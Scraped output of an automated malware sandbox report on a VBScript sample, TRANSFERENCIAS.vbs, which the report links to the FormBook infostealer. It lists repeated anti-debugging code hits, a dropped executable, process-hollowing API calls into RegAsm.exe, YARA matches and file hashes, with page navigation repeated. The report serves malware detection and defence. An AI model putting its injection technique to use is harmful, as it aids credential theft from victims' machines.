Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB2674 mov eax, dword ptr fs:[00000030h]	3_2_02CB2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE609 mov eax, dword ptr fs:[00000030h]	3_2_02CFE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF603 mov eax, dword ptr fs:[00000030h]	3_2_02CBF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB1607 mov eax, dword ptr fs:[00000030h]	3_2_02CB1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2619 mov eax, dword ptr fs:[00000030h]	3_2_02CC2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55636 mov eax, dword ptr fs:[00000030h]	3_2_02D55636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8262C mov eax, dword ptr fs:[00000030h]	3_2_02C8262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB6620 mov eax, dword ptr fs:[00000030h]	3_2_02CB6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB8620 mov eax, dword ptr fs:[00000030h]	3_2_02CB8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E627 mov eax, dword ptr fs:[00000030h]	3_2_02C9E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8D7E0 mov ecx, dword ptr fs:[00000030h]	3_2_02C8D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F78A mov eax, dword ptr fs:[00000030h]	3_2_02D3F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D537B6 mov eax, dword ptr fs:[00000030h]	3_2_02D537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C807AF mov eax, dword ptr fs:[00000030h]	3_2_02C807AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D097A9 mov eax, dword ptr fs:[00000030h]	3_2_02D097A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD7B0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04755 mov eax, dword ptr fs:[00000030h]	3_2_02D04755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov esi, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80750 mov eax, dword ptr fs:[00000030h]	3_2_02C80750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D53749 mov eax, dword ptr fs:[00000030h]	3_2_02D53749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C88770 mov eax, dword ptr fs:[00000030h]	3_2_02C88770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87703 mov eax, dword ptr fs:[00000030h]	3_2_02C87703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC700 mov eax, dword ptr fs:[00000030h]	3_2_02CBC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80710 mov eax, dword ptr fs:[00000030h]	3_2_02C80710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0710 mov eax, dword ptr fs:[00000030h]	3_2_02CB0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83720 mov eax, dword ptr fs:[00000030h]	3_2_02C83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov ecx, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A90008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

ID:	1525549
Product:	CloudBasic
Start time:	11:26:00
Start date:	04.10.2024
Sample:	TRANSFERENCIAS.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b378b2b63f8ee49548ea6e851b601321
SHA1:	8910d7499ed420934921e4407e18bdf92cc5bbae
SHA256:	c7da43b1032582ef7d03c48e749bbb56b18d2da5360a29341ada35ce67900e2e
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\temp_executable.exe.log	CSV text	EEEC189088CC5F1F69CEE62A3BE59EA2	250F25CE24458FC0C581FDDF59FAA26D557844C5	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
C:\Users\user\AppData\Local\Temp\temp_executable.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4BB2987F85F87A6488CE3152D6B85077	25ABFC49BBF8437303478F2DC8D97140DB776E0A	561EDC9EA0E5836B410835F7A3E3B33E1FF774CCA58491BC3FA7B168AAF5CD44

Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report TRANSFERENCIAS.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
TRANSFERENCIAS.vbs

Malware Threat Intel
Provided by